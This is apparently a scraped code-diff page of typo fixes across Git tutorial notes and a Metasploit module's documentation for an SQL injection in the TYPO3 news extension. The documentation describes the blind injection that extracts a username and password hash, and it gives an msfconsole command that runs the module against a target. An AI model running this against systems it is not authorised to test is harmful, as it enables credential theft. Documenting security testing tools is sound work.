* [GitHub Flow](http://scottchacon.com/2011/08/31/github-flow.html): Another great post from Scott Chacon describing a GitHub-based workflow for projects.
* [Getting Started with GitHub](http://pragprog.com/screencasts/v-scgithub/insider-guide-to-github): Also from GitHub's own Scott Chacon, this two-part screencast (one free and one paid) will walk you through the basics of using GitHub.
* [Getting Started with GitHub](https://pragprog.com/screencasts/v-scgithub/insider-guide-to-github): Also from GitHub's own Scott Chacon, this two-part screencast (one free and one paid) will walk you through the basics of using GitHub.
@@ -110,8 +110,8 @@ your day-to-day workflow with Git.
## Git in Bash
When using Git, it's very handy (read: pretty much mandatory) to have an ambient cue in your shell telling you what branch you're currently on. Use this function in your .profile/.bashrc/.bash_profile to enable you to place your Git branch in your prompt:
@@ -12,7 +12,7 @@ A fork is when you snapshot someone else's codebase into your own repo, presumab
You only fork once, you clone as many times as you have machines on which you want to code, and you branch, commit, and push as often as you like (you don't always have to push, you can push later or not at all, but you'll have to push before doing a pull request, a.k.a. PR), and you submit a PR when you are ready. See below
@@ -4,7 +4,7 @@ News module extensions v5.3.2 and earlier for TYPO3 contain an SQL injection vul
## Vulnerable Application
In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the paramter name. This allows a user to inject values to an SQL query.
In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the parameter name. This allows a user to inject values to an SQL query.
To exploit the vulnerability, the module generates requests and sets a value for `order` and `OrderByAllowed`, which gets passed to the SQL query. The requests are constructed to reorder the display of news articles based on a character matching. This allows a blind SQL injection to be performed to retrieve a username and password hash.
@@ -28,7 +28,7 @@ The value for query parameter `id` of the page that the news extension is runnin
- [ ] Verify if page is visble to unauthenticated user and note the id
- [ ] Verify if page is visible to unauthenticated user and note the id
- [ ] `./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost <rhost>; set id <id>; run'`
- [ ] Username and password hash should have been retrieved
Some files were not shown because too many files have changed in this diff
Show More
Reference in New Issue
Block a user
Blocking a user prevents them from interacting with repositories, such as opening or commenting on pull requests or issues. Learn more about blocking a user.